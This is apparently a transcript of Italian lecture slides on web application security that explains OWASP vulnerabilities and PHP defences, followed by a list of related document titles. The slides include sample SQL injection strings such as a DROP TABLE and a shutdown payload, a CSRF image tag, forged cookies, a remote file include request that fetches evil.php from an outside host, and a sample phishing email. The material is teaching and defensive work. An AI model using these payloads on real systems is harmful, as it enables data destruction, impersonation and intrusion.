Sicurezza delle applicazioni Web

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "Sicurezza delle applicazioni Web"

Transcript

1 Sicurezza delle applicazioni Web

2 Sicurezza delle applicazioni web [ ] Web application security deals with the overall Web application architecture, logic, coding, and content of the Web application. In other words, Web applications security is not about operating system vulnerability or the security defects in your commercial products; it is about the vulnerabilities of your own software. [ ]

3 Concetti di WebAppSec Richiesta HTTP request (cleartext or SSL) Accept from ANY via HTTP/HTTPS Allow SQL SQL Databas e Risposta Web server App. server DataBase HTTP reply (HTML, Javascript, VBscript, etc) Transport layer HTTP/ HTTPS over TCP/IP Apache IIS Netscape etc Plugins: Perl C/C++ JSP, etc Database connection: ADO, ODBC, etc. OWASP

4 Vulnerabilità nelle applicazioni web OWASP(Open Web Application Security Project) mantiene la lista delle vulnerabilità più critiche di un'applicazione web Unvalidated Input Broken Access Control Broken Authentication and Session Management Cross Site Scripting (XSS) Flaws Buffer Overflow Injection Flaws Improper Error Handling Insecure Storage Denial of Service Insecure Configuration Management

5 Mancanza di controllo dell'input Le informazioni ricevute a seguito di una richiesta non vengono validate. Questa tecnica può essere utilizzata per accedere alla parte di back-end Prima regola: non fidarsi mai delle informazioni fornite dal client nelle richieste HTTP (cookie, ID di sessione, parametri, header, referer)

6 Mancanza di controllo dell'input Parametri da controllare Il tipo di dato (string, integer, real, etc ) Il set di caratteri consentito La lunghezza minima e massima Controllare se è permesso il tipo NULL Controllare se il parametro è richiesto o meno Intervallo numerico

7 Unvalidated Input esempio (1) Manipolazione dei parametri inviati: Hidden Field Manipulation OWASP

8 Unvalidated Input esempio (2) Altero il valore in OWASP

9 Unvalidated Input esempio (3) OWASP

10 Unvalidated Input esempio (4) OWASP

11 Autenticazione insufficiente Avviene quando un attaccante può accedere ad informazioni riservate senza autenticarsi. Gli strumenti di amministrazione via web forniscono un esempio di accesso ad informazioni riservate Qualche volta le risorse sono protette nascondendo l'url che permette l'accesso ad un'area protetta che di solito viene messa nella directory /admin

12 Autenticazione insufficiente Si tratta di un approccio del tipo Security Through Obscurity. Anche se la risorsa non è direttamente accessibile, non vuol dire che sia davvero protetta L'URL potrebbe essere scoperta mediante un attacco brute force che prova i nomi di file e directory più comuni, attraverso l'analisi di messaggi di errore, dei file di log

13 Semantic URL attack Cosa succede se cambiamo il valore del parametro user?

14 File Upload attack <form action= upload.php method= POST enctype= multipart/form-data > <input type= file name= attchment > <input type= hidden name= MAX_FILE_SIZE value= 1024 > </form> Lato server si devono prendere provvedimenti per forzare la dimensione massima dei file che si possono copiare (in PHP esistono le direttive upload_max_filesize, post_max_size)

15 Broken Authentication Meccanismi di autenticazione non adeguati OWASP

16 Broken Authentication (2) OWASP

17 Referer spoofing Il campo referer dell'header HTTP contiene l'url di provenienza della richiesta Se un sito protegge le pagine consentendone la visualizzazione quando la richiesta proviene da un determinato insieme di URL, recuperando uno dei referer validi è possibile forgiare una richiesta che sarà accettata dal server

18 Gestione delle sessioni In alcuni casi i siti web permettono di riutilizzare vecchie sessioni senza farle scadere in modo appropriato - per fornire l'accesso ad un'area protetta Un attaccante potrebbe intercettare un session ID attraverso uno sniffer di rete o un attacco di tipo cross-site scripting e riutilizzarlo per impersonare un altro utente In una postazione pubblica un attaccante, usando il pulsante Back del browser, potrebbe accedere alle pagine visitate in precedenza dalla vittima

19 Concetto di gestione della sessione nel mondo reale Mario Rossi Dipendente Banca A. Ferrari Num. 33 Firma: A.Ferrari Carta di identità Mario Rossi Buongiorno Mario Rossi Ticket #33 Verifica identità in base alla carta di identità Ticket #33: mi dia 1000 euro dal mio conto Tenga 1000 euro Sig. Rossi Verifica identità in base al ticket OWASP

20 Gestione della sessione web --Procedura di autenticazione-- Mario Rosssi Web Server [1] https://www.mia-banca.it [2] Invio form di autenticazione via HTTPS Username/password Cookie=TWFyaW8123 Token di autenticazione [3] inserisce username/password via HTTPS [4] Welcome page personale e Set Cookie=TWFyaW8123 Verifica credenziali: se ok client autenticato Generazione del cookie --Richieste seguenti-- [5] Richiesta dell estratto CC (https://www. mia-banca.it/cont.jsp) [6] Invio del contenuto Cookie=TWFyaW8123 Verifica del cookie: Identifica il mittente Invio del contenuto al DEST OWASP

21 Furto di identità Mario Rossi Se altero la GET HTTP, forgiando il cookie sono in grado di accedere al contenuto di un altra persona Per implementare una corretta gestione delle sessioni è necessario proteggere sia le credenziali di autenticazione di un utente che i token di sessione generati dal server ed assegnati all utente [5a]Richiesta dell estratto CC (https://www. mia-banca.it/cont.jsp) Cookie=TWFyaW8122 [6a] Invio del contenuto di Paolo Verdi Verifica del cookie: TWFyaW8122 Identifica il mittente Paolo Verdi Invio del contenuto di Paolo Verdi al destinatario Mario Rossi I dati relativi all utenza di Verdi non sono stati adeguatamente protetti OWASP

22 SQL Injection SQL Injection is a technique for exploiting web applications that use clientsupported data in SQL queries without stripping potentially harmful characters first

23 SQL Injection $sql = SELECT * FROM client WHERE username=. $_POST['username']. AND password=. $_POST['password']. ; Esempi SELECT * FROM client WHERE username= Rossi AND password= **** SELECT * FROM client WHERE username= Rossi OR 1=1 -- Commento in molti DBMS!

24 SQL Injection (in ASP)

25 SQL Injection Username:rossi, Password:******* Username:verdi, Password:******* Username: OR = Passowrd: OR = SELECT * FROM client WHERE username= OR = AND password= OR = true!!

26 SQL Injection (in ASP)

27 SQL Injection Username: ; DROP TABLE clienti-- (per Transact-SQL, usato da SQL server) userid: 123; shutdown-- Per saperne di più

28 Soluzione? Validare sempre molto bene i dati in input usando, se possibile, le espressioni regolari Suggerimento: considerate quali sono i dati validi e rifiutate tutto il resto

29 Cross-Site Request Forgeries Permette ad un attaccante di far spedire richieste HTTP arbitrarie alla vittima <html> <body> testo qui testo qui testo qui<br/> <img src="http://.../compra.php? item=penne&quantity=10"> </body> </html>

30 Cross-Site Request Forgeries File compra.php <?php // controllo sessione $item = $_REQUEST['item']; $quantity = $_REQUEST['quantity']; $out = "Ho appena ricevuto un ordine per $quantity $item!!!\n"; $fp=fopen('ordini.txt','a'); fwrite($fp,$out); fclose($fp);?>

31 Cross-Site Request Forgeries Come difendersi? Non usare $_REQUEST ma scegliere $_POST oppure $_GET Verificare che i dati arrivino davvero dal form che è stato predisposto Si può introdurre nei form un valid token, per esempio un numero generato in modo casuale o un timestamp che viene anche memorizzato in una variabile di sessione dell'utente

32 Web cookies: not just a privacy risk DoubleClick (e altri) usa i cookie per tracciare gli utenti e per mandare messaggi pubblicitari mirati. Ma questo non è un vero pericolo Il pericolo nasce quando i cookie vengono usati per l'autenticazione e, soprattutto, quando vengono fornite informazioni personalizzate

33 Web cookies: not just a privacy risk La specifica dei cookie si basa infatti su un'idea di collaborazione tra browser e server e molti siti non salvano i cookie in modo sicuro Diventa facile forgiare un nuovo cookie per impersonare un altro utente Quindi, è opportuno non affidarsi mai al solo meccanismo dei cookie per restituire informazioni sensibili

34 Errata gestione della sessione - Furto di identità Cookie poisoning Alterando campi forniti al client tramite un cookie (stato), un attaccante può impersonare un utente per accedere a servizi web. Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30gmt ; Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30gmt ; Cookie guessable Cookie:aefdsg6757nb90 ; M.Rossi Cookie:aefdsg6757nb92 ; G.Verdi Cookie:aefdsg6757nb9? ; V.Bianchi OWASP

35 Homograph Attack Il problema sorge a causa dell'equivalenza visiva tra le lettere di alfabeti diversi Siamo abituati a confondere 0 (zero) con O (o maiuscola) ma esistono altri caratteri che pur essendo visivamente simili, sono semanticamente molto diversi! Nel cirillico ci sono per esempio le lettere a, c, e, p, y, x,

36 Homograph Attack John Hacker imita il nome del sito web della vostra banca Installa un proxy che instrada in modo trasparente tutte le vostre richieste alla vostra banca Inserisce il suo link nei portali più importanti

37 Homograph Attack Poiché la maggior parte delle volte clicchiamo sui link e non li scriviamo direttamente nella location bar John Hacker ha accesso a login e password dei clienti della banca Per saperne di più

38 Phishing Tecnica di ingegneria sociale utilizzata per ottenere l'accesso ad informazioni personali e riservate con la finalità del furto di identità, mediante l'utilizzo di messaggi di posta elettronica fasulli oppurtunamente creati per apparire autentici

39 Esempio di phishing Cari clienti della banca via Internet Imprese. Vorremmo informarvi l'indirizzo fisso del nuovo web server del servizio online banking - A causa sovraccarico del nostro generale server la nostra zona tecnica e allargata con l'aggiunta di nuovo server attualmente nella fase di test. Vi pregiamo essere soggetti alla procedura obbligatoria d'autenticazione al nuovo server per far transferire i Vostri dati d'utente con successo alla base dei dati del nuovo piu protetto server del servizio online banking. continua

40 Esempio di phishing 1.Aprite la web pagina 2.Inserite nel Vostro conto online usando la combinazione Codice i Pin. 3.Per evitare la perdita dei Vostri dati personali e per la protezione contro assalti di "Phishing" si prega di sempre chiudere la finestra del Vostro Internet Browser al termine di lavori con la banca online. Vi pregiamo distinti saluti, il servizio d'assistenza tecnica della banca online ByBank

41 Rappresentazione canonica Do not make any security decision based on the name of a resource, especially a filename Esistono nomi diversi per identificare la stessa risorsa /home/stud/2000s000/index.html ~2000s000/index.html /home/../home/stud/ Il nome canonico è quello più semplice (lo standard)

42 Bypassing Napster Name Filtering Canonicalization bug Il blocco delle canzoni è stato fatto sulla base del nome della canzone e non ci è voluto molto a bypassare il filtro.. changes the file names of songs inside a person's Napster directory into a spelling inspired by Pig Latin. The Radiohead song "Karma Police," for example, would be transformed into "armak olicep."

43 Come possiamo difenderci?

44 Difesa in profondità Si tratta di un principio ben noto tra i professionisti di sicurezza E importante avere delle salvaguardie ridondanti. Per esempio è una buona pratica richiedere nuovamente la password ad un utente autenticato quando si devono svolgere azioni importanti

45 Minimo Privilegio Fornire privilegi non necessari può aumentare i rischi di una applicazione Lo abbiamo visto quando abbiamo discusso i privilegi degli utenti di MySQL

46 Minimizzare l'esposizione Le applicazioni web richiedono comunicazioni frequenti con sorgenti di dati remote Diventa importante fare il tracking dei dati per capire quali sono i dati esposti Ad esempio, nel caso di pagamento con carta di credito si dovrebbe usare SSL per proteggere la fase di verifica delle informazioni sulla carta di credito perché queste vengono mandate al client e quindi esposte nella rete Internet

47 Tracciare i dati Bisogna distinguere tra i dati dei quali ci si può fidare e di quelli che invece non sono fidati Si deve capire quali sono i dati che entrano nell'applicazione e quali sono i dati che escono Es: echo -> dati in uscita mysql_query -> dati in ingresso al database

48 Filtrare l'input Identificare l'input Filtrare l'input Distinguere tra input filtrato e input non filtrato (tainted)

49 In PHP: Register Globals Con la direttiva register_globals = On vengono create in automatico delle variabili globali a partire da molte sorgenti remote (moduli, database, cookie, sessioni) Se abilitata, questa direttiva nasconde l'origine dei dati e questo può aprire delle vulnerabilità nel codice PHP

50 Esempio: PHP File Include Attack Con le register globals = On viene creata la variabile $name inizializzata al valore 'value' La funzione include() di PHP permette anche di includere file esterni

51 Esempio: PHP File Include Attack <?php include($vuln);?> 1) GET /a.php?vuln=http://webhost.com/evil.php attacker target 4) Output of evil.php is sent to the attacker webhost.com 2) Target makes request to webhost.com/evil.php 3) The malicious PHP file 'evil.php' is sent to the Target and is executed by the include() function.

52 In PHP: Filtrare l'input Gli array superglobali permettono di identificare l'origine dei dati ($_POST, $_GET, $_COOKIES, ) Anche $_SERVER contiene dati in arrivo dall esterno che possono essere manipolati $_SESSION Dati in arrivo dai database

53 In PHP: Filtrare l'input Non si deve mai cercare di correggere i dati in arrivo, ma si deve obbligare l utente ad inserire dati corretti Si possono usare convenzioni nei nomi per distingure tra dati filtrati e dati non filtrati. Ad esempio, si possono copiare i dati filtrati in un array $clean[] e usare solo i dati in questo array per la logica dell applicazione (NB. l'array $clean[] va inizializzato!)

54 In PHP: Escape dell'output Identificare l'output (echo, printf, print, <?=) Escape dell'output Dipende ovviamente dal tipo di sistema cui si spediscono i dati. Ad esempio, nel caso del browser, si può usare la funzione htmlentities(). Nel caso di MySQL, se non esiste una funzione di escape nativa si può usare la funzione addslashes() Distinguere tra dati escaped e dati non escaped

55 In PHP: Error Reporting Non si dovrebbero mai rendere pubbliche le informazioni che vengono restituite da PHP in caso di errore Nel file php.ini display_errors = Off log_errors = On error_log = nomefile error_reporting = E_ALL Da programma PHP <? ini_set( display_errors, Off ); ini_set( log_errors, On ); ini_set( error_log, /usr/local/ ); ini_set( error_reporting, E_ALL );?>

56 Insecure Configuration Management È diffusa la pratica di non eliminare oggetti o codici sorgenti non più necessari per l erogazione del servizio dai quali è spesso possibile ottenere informazioni critiche per il sistema. Vulnerabiltà note non corrette all interno dei software installati nel server Vulnerabilità all interno dei software installati nel server oppure configurazioni errate che permettono di eseguire attacchi Presenza di contenuti non necessari quali pagine di defaut, backup di dati, script, applicazioni, file di configurazione e vecchie pagine web Come proteggersi? Eliminare tutto ciò che non è necessario OWASP

57 Il problema è sociale... [...]is much easier to trick someone into giving a password for a system than to spend the effort to hack into the system. [...] it was the single most effective method in my arsenal. Kevin Mitnick

Indice register_globals escaping

Indice register_globals escaping 1 Indice La sicurezza delle applicazioni web Le vulnerabilità delle applicazioni web La sicurezza in PHP: La direttiva register_globals Filtrare l'input Filtrare l'output (escaping) SQL Injection Cross

Dettagli

SQL Injection. Homograph Attack. Cross-Site Scripting. SQL Injection

SQL Injection. Homograph Attack. Cross-Site Scripting. SQL Injection SQL Injection SQL Injection Homograph Attack Cross-Site Scripting SQL Injection is a technique for exploiting web applications that use clientsupported data in SQL queries without stripping potentially

Dettagli

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS)

Attacchi alle applicazioni web: SQL injection e Cross-site scripting (XSS) UNIVERSITÀ DEGLI STUDI DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Tesina di Sicurezza nei Sistemi informativi Simona Ullo Attacchi alle applicazioni web: SQL

Dettagli

Attacchi Web. Davide Marrone

Attacchi Web. Davide Marrone <davide@security.dico.unimi.it> Davide Marrone davide@security.dico.unimi.it Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Dipartimento di Informatica e Comunicazione 22 gennaio 2007 Sommario Classificazione

Dettagli

KLEIS WEB APPLICATION FIREWALL

KLEIS WEB APPLICATION FIREWALL KLEIS WEB APPLICATION FIREWALL VERSIONE 2.1 Presentazione www.kwaf.it Cos'è Kleis Web Application Firewall? Kleis Web Application Firewall (KWAF) è un firewall software per la difesa di: Web Application

Dettagli

Laboratorio di reti II: Problematiche di sicurezza delle reti

Laboratorio di reti II: Problematiche di sicurezza delle reti Laboratorio di reti II: Problematiche di sicurezza delle reti Stefano Brocchi brocchi@dsi.unifi.it 30 maggio, 2008 Stefano Brocchi Laboratorio di reti II: Sicurezza web 30 maggio, 2008 1 / 43 La sicurezza

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Sicurezza delle applicazioni web: attacchi web Alessandro Reina Aristide Fattori

Dettagli

Sicurezza delle applicazioni web: attacchi web

Sicurezza delle applicazioni web: attacchi web Università degli Studi di Milano Facoltà di Scienze Matematiche, Fisiche e Naturali Anno Accademico 2010/2011 Sicurezza delle applicazioni web: attacchi web Alessandro Reina, Aristide Fattori 12 Maggio

Dettagli

Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting

Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting Pattern Recognition and Applications Lab Analisi di vulnerabilità e prevenzione di attacchi SQL injection e Cross-site Scripting Dott. Ing. Igino Corona igino.corona (at) diee.unica.it Corso Sicurezza

Dettagli

PHP Secure Programming

PHP Secure Programming PHP Secure Programming Seminario sviluppato nell'ambito del corso di Sicurezza, Dipartimento di Informatica e Scienze dell'informazione (DISI), Genova Autore: Matteo Greco

Dettagli

Corso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti

Corso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti Corso di Sicurezza Informatica Sicurezza del software Ing. Gianluca Caminiti SQL Injection Sommario Premessa sul funzionamento dei siti dinamici SQL Injection: Overview Scenari di attacco: Errata gestione

Dettagli

Attacchi alle Applicazioni Web

Attacchi alle Applicazioni Web Attacchi alle Applicazioni Web http://www.infosec.it info@infosec.it Relatore: Matteo Falsetti Webbit03 Attacchi alle Applicazioni Web- Pagina 1 Applicazioni web: definizioni, scenari, rischi ICT Security

Dettagli

Web Application (In)Security

Web Application (In)Security Web Application (In)Security Alessandro jekil Tanasi alessandro@tanasi.it http://www.tanasi.it LUG Trieste Introduzione.. Ciao Gianni, sai ci siamo fatti fare il sito nuovo, abbiamo speso solo 500 ϵ..no

Dettagli

Esercitazione 8. Basi di dati e web

Esercitazione 8. Basi di dati e web Esercitazione 8 Basi di dati e web Rev. 1 Basi di dati - prof. Silvio Salza - a.a. 2014-2015 E8-1 Basi di dati e web Una modalità tipica di accesso alle basi di dati è tramite interfacce web Esiste una

Dettagli

Sicurezza delle applicazioni web

Sicurezza delle applicazioni web Sicurezza delle applicazioni web (Programmazione sicura in ambiente web) Luca Carettoni l.carettoni@securenetwork.it 26 Novembre Linux Day 2005 2005 Secure Network S.r.l. Il peggiore dei mondi... Un server

Dettagli

Navigazione automatica e rilevazione di errori in applicazioni web

Navigazione automatica e rilevazione di errori in applicazioni web Politecnico di Milano Navigazione automatica e rilevazione di errori in applicazioni web Relatore: Prof. Stefano Zanero Fabio Quarti F e d e r i c o V i l l a A.A. 2006/2007 Sommario Obiettivo: Illustrare

Dettagli

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection ---------------------------------------------------------------------..... _/ / _ / / \ \/ / / / / \ / \ \ \ / /_/ \ /\ / \ \ \ / /_/ > Y \ \ \ >\_/ / > / \ / / \/ \/ \/ \/ / / \/ ---------------------------------------------------------------------

Dettagli

Apriti Sesamo Plus. Autenticazione Forte AntiPhishing portabilità e protezione dei dati

Apriti Sesamo Plus. Autenticazione Forte AntiPhishing portabilità e protezione dei dati Apriti Sesamo Plus come sistema di Autenticazione Forte AntiPhishing portabilità e protezione dei dati Massimo Penco mpenco@globaltrust.it 1 Sommario -line: il Phishing Una panoramica sulle tecniche più

Dettagli

Creare un portale web con strumenti Open Source

Creare un portale web con strumenti Open Source Creare un portale web con strumenti Open Source Il caso di Arsié http://www.arsie.net 1/30 Lucia De Pasqual lucia@arsie.net BLUG - Belluno Linux User Group http://belluno.linux.it CMS e Portali Content

Dettagli

Cookie (1) - Componenti

Cookie (1) - Componenti Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Chiara Braghin chiara.braghin@unimi.it! Cookie (1) - Componenti 4 componenti: 1) cookie nell header del messaggio HTTP response

Dettagli

Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection

Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Elementi di Sicurezza e Privatezza Lezione 10 Web Security (2) Code Injection Chiara Braghin chiara.braghin@unimi.it! Cookie (1) - Componenti 4 componenti: 1) cookie nell header del messaggio HTTP response

Dettagli

TeamPortal. Servizi integrati con ambienti Gestionali

TeamPortal. Servizi integrati con ambienti Gestionali TeamPortal Servizi integrati con ambienti Gestionali 12/2013 Accesso da remoto Accesso da remoto Esempio 1 Sul Firewall devono essere aperte le porte 80 : http (o quella assegnata in fase di installazione/configurazione

Dettagli

TeamPortal. Infrastruttura

TeamPortal. Infrastruttura TeamPortal Infrastruttura 05/2013 TeamPortal Infrastruttura Rubriche e Contatti Bacheca Procedure Gestionali Etc Framework TeamPortal Python SQL Wrapper Apache/SSL PostgreSQL Sistema Operativo TeamPortal

Dettagli

19. LA PROGRAMMAZIONE LATO SERVER

19. LA PROGRAMMAZIONE LATO SERVER 19. LA PROGRAMMAZIONE LATO SERVER Introduciamo uno pseudocodice lato server che chiameremo Pserv che utilizzeremo come al solito per introdurre le problematiche da affrontare, indipendentemente dagli specifici

Dettagli

Agenda. IT Security Competence Center Web Application Security. Web Application Security. Tito Petronio 03/03/2011

Agenda. IT Security Competence Center Web Application Security. Web Application Security. Tito Petronio 03/03/2011 IT Security Competence Center Web Application Security Tito Petronio SANS GCFA, GWAS Certified Professional 18 Febbraio 2011 Agenda Web Application Security OWASP Vulnerabilità delle Applicazioni Web Sicurezza

Dettagli

Simone Riccetti. Applicazioni web:security by design

Simone Riccetti. Applicazioni web:security by design Simone Riccetti Applicazioni web:security by design Perchè il problema continua a crescere? Connettività: Internet L incremento del numero e delle tipologie d vettori di attacco è proporzionale all incremento

Dettagli

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin Elementi di Sicurezza e Privatezza Lezione 13 Web Security Chiara Braghin Cookie e Sicurezza HTTP e i cookie (1) Vi ricordate? I Web server in genere sono stateless: una serie di richieste dallo stesso

Dettagli

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin. Cookie e Sicurezza

Elementi di Sicurezza e Privatezza Lezione 13 Web Security. Chiara Braghin. Cookie e Sicurezza Elementi di Sicurezza e Privatezza Lezione 13 Web Security Chiara Braghin Cookie e Sicurezza 1 HTTP e i cookie (1) Vi ricordate? I Web server in genere sono stateless: una serie di richieste dallo stesso

Dettagli

SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro?

SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro? SQL Injection The dark side of webapplication *** Siamo davvero certi che chi gestisce i nostri dati sensibili lo faccia in modo sicuro? Che cos'e' SQL? Acronimo di 'Structured Query Language E' un linguaggio

Dettagli

Obiettivi d esame PHP Developer Fundamentals on MySQL Environment

Obiettivi d esame PHP Developer Fundamentals on MySQL Environment Obiettivi d esame PHP Developer Fundamentals on MySQL Environment 1.0 Ambiente di sviluppo 1.1 Web server e database MySQL Comprendere la definizione dei processi che si occupano di fornire i servizi web

Dettagli

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database

Corso di Informatica. Prerequisiti. Modulo T3 B3 Programmazione lato server. Architettura client/server Conoscenze generali sui database Corso di Informatica Modulo T3 B3 Programmazione lato server 1 Prerequisiti Architettura client/server Conoscenze generali sui database 2 1 Introduzione Lo scopo di questa Unità è descrivere gli strumenti

Dettagli

Programmazione Web. Laboratorio 4: PHP e MySQL

Programmazione Web. Laboratorio 4: PHP e MySQL Programmazione Web Laboratorio 4: PHP e MySQL Lavagna elettronica (I) Un unità aziendale di decision making opera per le decisioni di tipo consueto e ripetitivo tramite la procedura seguente: un qualsiasi

Dettagli

Concetti base di sicurezza applicativa web. Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna

Concetti base di sicurezza applicativa web. Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna Concetti base di sicurezza applicativa web Massimo Carnevali Responsabile Esercizio dei Sistemi Informativi Comune di Bologna Agenda Concetti base Esempio reale (SQL code injection) Come cambia lo scenario

Dettagli

Sicurezza WEB LINGUAGGI E APPLICAZIONI MULTIMEDIALI - ISTI Informa?on Science and Technology Ins?tute

Sicurezza WEB LINGUAGGI E APPLICAZIONI MULTIMEDIALI - ISTI Informa?on Science and Technology Ins?tute Sicurezza WEB LINGUAGGI E APPLICAZIONI MULTIMEDIALI - Maurizio Maffi ISTI Informa?on Science and Technology Ins?tute Sicurezza Web Programmando applicazioni Web based bisogna sempre tenere in considerazione

Dettagli

Vulnerabilità informatiche (semplici)..

Vulnerabilità informatiche (semplici).. Vulnerabilità informatiche (semplici).. in infrastrutture complesse....il contenuto di questo speech è di pura fantasia, ogni riferimento a infrastrutture reali o fatti realmente accaduti è puramente casuale

Dettagli

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti L attività di un Ethical Hacker Esempi pratici, risultati e contromisure consigliate Massimo Biagiotti Information Technology > Chiunque operi nel settore sa che il panorama dell IT è in continua evoluzione

Dettagli

Servizi centralizzati v1.2 (20/12/05)

Servizi centralizzati v1.2 (20/12/05) Servizi centralizzati v1.2 (20/12/05) 1. Premessa Anche se il documento è strutturato come un ricettario, va tenuto presente che l argomento trattato, vista la sua variabilità, non è facilmente organizzabile

Dettagli

OWASP Web Application Penetration Checklist. Versione 1.1

OWASP Web Application Penetration Checklist. Versione 1.1 Versione 1.1 14 Luglio 2004 Questo documento è rilasciato sotto la licenza GNU, e il copyright è proprietà della Fondazione OWASP. Siete pregati di leggere e comprendere le condizioni contenute in tale

Dettagli

--- PREMESSE INTRODUZIONE. .:luxx:.

--- PREMESSE INTRODUZIONE. .:luxx:. SQL INJECTION --- SICUREZZA.:luxx:. PREMESSE Questa guida accenna ad alcuni metodi di SQL injection e si sofferma sulla prevenzione di tali attacchi, per comprendere al meglio il testo è necessaria una

Dettagli

Assignment (1) - Varie

Assignment (1) - Varie Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it!

Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Elementi di Sicurezza e Privatezza Laboratorio 6 - Vulnerabilità di applicazioni Web (1) Chiara Braghin chiara.braghin@unimi.it! Assignment (1) - Varie Al link http://www.dti.unimi.it/braghin/ elementi/lab/lista_consegnati.pdf

Dettagli

Session tracking Session tracking HTTP: è stateless, cioè non permette di associare una sequenza di richieste ad un dato utente. Ciò vuol dire che, in generale, se un browser richiede una specifica pagina

Dettagli

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report Sommario Introduzione...3 Lista delle Vulnerabilità...3 Descrizione delle vulnerabilità...3 XSS...3 Captcha...4 Login...5

Dettagli

UNIVERSITÀ DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica. Simona Ullo

UNIVERSITÀ DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica. Simona Ullo UNIVERSITÀ DI CATANIA Facoltà di Ingegneria Corso di laurea Specialistica in Ingegneria Informatica Simona Ullo ATTACCHI ALLE APPLICAZIONI WEB: SQL INJECTION E CROSS SITE SCRIPTING (XSS) Tesina di Sicurezza

Dettagli

Tecnologia avanzata e project engineering al servizio della PA Sicurezza delle reti della PA, dei servizi pubblici e delle attività digitali degli impiegati pubblici FORUM PA Digital Security per la PA

Dettagli

Corso di Web Programming

Corso di Web Programming Corso di Web Programming 11. PHP - Complementi Paolo Milazzo Dipartimento di Informatica, Università di Pisa http://www.di.unipi.it/ milazzo milazzo di.unipi.it Corso di Laurea in Informatica Applicata

Dettagli

Le problematiche di Web Application Security: la visione di ABI Lab. The OWASP Foundation http://www.owasp.org. Matteo Lucchetti

Le problematiche di Web Application Security: la visione di ABI Lab. The OWASP Foundation http://www.owasp.org. Matteo Lucchetti Le problematiche di Web Application Security: la visione di ABI Lab Matteo Lucchetti Senior Research Analyst ABI Lab OWASP-Day II Università La Sapienza, Roma 31st, March 2008 Copyright 2008 - The OWASP

Dettagli

Corso di PHP. Prerequisiti. 6.1 PHP e il web 1. Conoscenza HTML Tecnica della programmazione Principi di programmazione web

Corso di PHP. Prerequisiti. 6.1 PHP e il web 1. Conoscenza HTML Tecnica della programmazione Principi di programmazione web Corso di PHP 6.1 PHP e il web 1 1 Prerequisiti Conoscenza HTML Tecnica della programmazione Principi di programmazione web 2 1 Introduzione In questa Unità illustriamo alcuni strumenti di programmazione

Dettagli

Internet Banking e Web Security

Internet Banking e Web Security Internet Banking e Web Security Giorgio Fedon Chief Operation Officer Minded Security S.r.l. OWASP-Day II Università La Sapienza, Roma 31st, March 2008 giorgio.fedon@mindedsecurity.com Copyright 2008 -

Dettagli

Tecnologie e Programmazione Web

Tecnologie e Programmazione Web Presentazione 1 Tecnologie e Programmazione Web Html, JavaScript e PHP RgLUG Ragusa Linux Users Group SOftware LIbero RAgusa http://www.solira.org - Nunzio Brugaletta (ennebi) - Reti 2 Scopi di una rete

Dettagli

PHP. Per poter interagire con i dati che si trovano sul server remoto occorrono strumenti server-side.

PHP. Per poter interagire con i dati che si trovano sul server remoto occorrono strumenti server-side. PHP Il linguaggio HTML e i linguaggi di scripting come Javascript impongono alcune limitazioni alle applicazioni che si possono realizzare : per esempio non è possibile costruire un sito Web che consenta

Dettagli

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer

Tecnologie per il Web. Il web: Architettura HTTP HTTP. SSL: Secure Socket Layer Tecnologie per il Web Il web: architettura e tecnologie principali Una analisi delle principali tecnologie per il web Tecnologie di base http, ssl, browser, server, firewall e proxy Tecnologie lato client

Dettagli

Vallarino Simone. Corso di sicurezza A.A. 2003/2004 HTTPS

Vallarino Simone. Corso di sicurezza A.A. 2003/2004 HTTPS Vallarino Simone Corso di sicurezza A.A. 2003/2004 HTTPS INTRODUZIONE Per cominciare a parlare di https è necessario aprire la discussione ricordando le caratteristiche dell http: HTTP Nel sistema telematico

Dettagli

Legenda: Vengono riportate qui brevi descrizioni di alcuni dei più noti e comuni tipi di vulnerabilità,in base al loro grado di pericolosità.

